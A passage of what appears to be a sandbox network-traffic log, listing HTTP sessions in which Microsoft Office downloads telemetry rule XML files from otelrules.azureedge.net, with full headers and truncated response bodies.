2024-11-14 14:25:36 UTC  1393               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


Session ID  Source IP    Source Port  Destination IP  Destination Port
86          192.168.2.5  49795        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:36 UTC  192                OUT        GET /rules/rule700200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:36 UTC  517                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:36 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF66E42D"
x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142536Z-16547b76f7flf9g6hC1DFWmcx8000000097000000000k8x5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:36 UTC  1356               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        87192.168.2.54979713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-16547b76f7fp6mhthC1DFWrggn0000000kwg00000000amwu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:36 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.5 | 49796 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:36 UTC | 192 | OUT | GET /rules/rule702351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:36 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:36 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE017CAD3"
x-ms-request-id: 5c63f72a-901e-0067-46a3-34b5cb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142536Z-1749fc9bdbddwt7mhC1DFWssk800000000pg000000000wa0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:36 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.2.5 | 49798 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:36 UTC | 192 | OUT | GET /rules/rule701251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:36 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:36 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE12A98D"
x-ms-request-id: 790f93ef-601e-003e-42a2-343248000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142536Z-1749fc9bdbdnkwnnhC1DFWud0400000002pg000000002cu8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:36 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.2.5 | 49799 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:36 UTC | 192 | OUT | GET /rules/rule701250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:36 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:36 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE022ECC5"
x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142536Z-16547b76f7fxdzxghC1DFWmf7n0000000kug00000000fbeb
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:36 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.2.5 | 49800 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:37 UTC | 192 | OUT | GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:37 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d3f1dd38-201e-0096-6e47-35ace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-1749fc9bdbd9f5rdhC1DFWbers00000002ng00000000fufk
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:37 UTC | 1389 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.2.5 | 49801 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:37 UTC | 192 | OUT | GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:37 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-16547b76f7fkcrm9hC1DFWxdag0000000kw000000000bvyh
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:37 UTC | 1352 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.2.5 | 49803 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:37 UTC | 192 | OUT | GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:37 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDDC22447"
x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142537Z-16547b76f7f7lhvnhC1DFWa2k00000000ks0000000002esx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:37 UTC | 1368 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


Session ID | Source IP | Source Port | Destination IP | Destination Port
94 | 192.168.2.5 | 49802 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:37 UTC | 192 | OUT | GET /rules/rule702951v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:37 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:37 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE12B5C71"
x-ms-request-id: 6b9ee1ab-f01e-0071-4fa1-34431c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142537Z-1749fc9bdbdjznvchC1DFWx4dc00000002eg00000000es78
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:37 UTC | 1405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session ID | Source IP | Source Port | Destination IP | Destination Port
95 | 192.168.2.5 | 49804 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:37 UTC | 192 | OUT | GET /rules/rule701151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:37 UTC | 515 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:37 GMT
Content-Type: text/xml
Content-Length: 1401
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE055B528"
x-ms-request-id: 21399fcf-c01e-008e-25a8-347381000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142537Z-r178fb8d765z89v7hC1DFW0kvw00000002mg00000000181a
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-14 14:25:37 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


Session ID | Source IP | Source Port | Destination IP | Destination Port
96 | 192.168.2.5 | 49805 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule701150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:38 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:38 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1223606"
x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142538Z-16547b76f7frbg6bhC1DFWr5400000000kn000000000gs21
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:38 UTC | 1364 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
97 | 192.168.2.5 | 49807 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:38 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-16547b76f7f7lhvnhC1DFWa2k00000000kr0000000006e08
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:38 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
98 | 192.168.2.5 | 49806 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:38 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9636621b-f01e-0003-2da1-344453000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-1749fc9bdbdgs9sshC1DFWt6ws00000002q000000000f28y
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:38 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


Session ID | Source IP | Source Port | Destination IP | Destination Port
99 | 192.168.2.5 | 49808 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:38 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDCB4853F"
x-ms-request-id: 6a0cb2be-701e-0032-13a8-34a540000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142538Z-r178fb8d765th6bkhC1DFWr7h000000002ng00000000m99u
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:38 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
100 | 192.168.2.5 | 49809 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule700400v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:38 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:38 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB779FC3"
x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142538Z-16547b76f7flf9g6hC1DFWmcx800000009b0000000007qsn
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:38 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


Session ID | Source IP | Source Port | Destination IP | Destination Port
101 | 192.168.2.5 | 49810 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:38 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:39 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:38 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFD43C07"
x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142538Z-16547b76f7f22sh5hC1DFWyb4w0000000ksg000000002shb
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:39 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


Session ID | Source IP | Source Port | Destination IP | Destination Port
102 | 192.168.2.5 | 49811 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:39 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:39 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:39 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDD74D2EC"
x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142539Z-16547b76f7fkcrm9hC1DFWxdag0000000kv000000000dx03
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:39 UTC  1360               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


Session ID  Source IP    Source Port  Destination IP  Destination Port
103         192.168.2.5  49813        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:39 UTC  192                OUT        GET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
